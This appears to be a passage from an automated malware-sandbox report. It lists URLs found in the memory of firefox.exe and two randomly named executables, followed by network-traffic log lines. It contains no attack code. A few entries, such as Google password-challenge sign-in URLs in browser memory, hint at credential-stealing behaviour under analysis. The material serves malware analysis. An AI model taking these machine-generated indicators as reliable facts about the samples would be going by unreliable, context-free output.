Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C621F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001C.00000002.3410454102.00000F0B1BE00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://twitter.com
Source: firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3389538102.000001F4CA29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3352798382.000001F4C6690000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3352798382.000001F4C6669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3244944098.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 0000001C.00000003.3244944098.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3389538102.000001F4CA29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: 6523f73121.exe, 00000009.00000002.3690395511.000000000B6B2000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3739452522.0000000001120000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/Z
Source: firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3140571050.000001F4C6600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/moz-extension://dbafc980-5b30-462a-a0c6-668ba5b09
Source: firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3389538102.000001F4CA29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3389538102.000001F4CA29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3389538102.000001F4CA29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3458065844.0000000005959000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3457774732.000000000595B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000001C.00000002.3406073174.000001F4CF06B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3352798382.000001F4C6669000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3389538102.000001F4CA29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001C.00000003.3242027640.000001F4CEB9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3399651010.000001F4CEB9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 0000001C.00000003.3302656872.000001F4CEFDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3140571050.000001F4C6600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3458065844.0000000005959000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3457774732.000000000595B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/2
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3140571050.000001F4C6600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001C.00000002.3352798382.000001F4C6669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001C.00000003.3244944098.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3739232134.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3739232134.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3410020463.00000C6EFF700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3344466497.000001F4C3C4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3386470444.000001F4C9D22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C6203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001C.00000002.3405019776.000001F4CF003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3301670585.000001F4CF02B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C6297000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: 6523f73121.exe, 00000009.00000002.3659341926.0000000000737000.00000040.00000001.01000000.0000000A.sdmp, 6523f73121.exe, 00000009.00000002.3659341926.0000000000654000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: 6523f73121.exe, 00000009.00000002.3659341926.0000000000737000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/about/HJKEBFHIJDHC
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3738663916.0000000005C3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 0000001C.00000002.3402180192.000001F4CEDBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3401464503.000001F4CECD6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3402775348.000001F4CEE03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 6523f73121.exe, 00000009.00000002.3659341926.0000000000737000.00000040.00000001.01000000.0000000A.sdmp, 6523f73121.exe, 00000009.00000002.3659341926.0000000000654000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: 6523f73121.exe, 00000009.00000002.3659341926.0000000000737000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3738663916.0000000005C3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3738663916.0000000005C3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001C.00000002.3382631506.000001F4C8E4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 0000001C.00000002.3332029856.000001F4C2043000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.comZ
Source: firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3352798382.000001F4C6669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://www.openh264.org//
Source: firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/Z
Source: 6523f73121.exe, 00000009.00000002.3690395511.000000000B6B2000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3739452522.0000000001120000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.tsn.ca
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://www.widevine.com/3
Source: firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3389538102.000001F4CA29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/Z
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3352798382.000001F4C6669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 0000001C.00000002.3410454102.00000F0B1BE00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://yandex.com
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C621F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001C.00000002.3383206866.000001F4C8FF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3314426054.000001F4C9DC6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3379563807.000001F4C8CBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3358281571.000001F4C6B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001C.00000002.3358281571.000001F4C6B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 0000001C.00000002.3329626750.000001F4B80EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=ht
Source: firefox.exe, 0000001C.00000002.3347166615.000001F4C4152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sigV&2
Source: firefox.exe, 0000001C.00000002.3352472754.000001F4C652B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3328507756.000001F4B686B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3328507756.000001F4B685E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3328507756.000001F4B6811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3317498172.000000E20B1D8000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3328507756.000001F4B6803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001A.00000002.3129850226.000001D3D9B7A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3137385023.000002319939F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3327517171.000001F4B6489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001C.00000002.3327517171.000001F4B6489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd_
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdhttps://firefox.sett
Source: firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.comZ

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 50251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50186
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50185
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50188
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50191
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
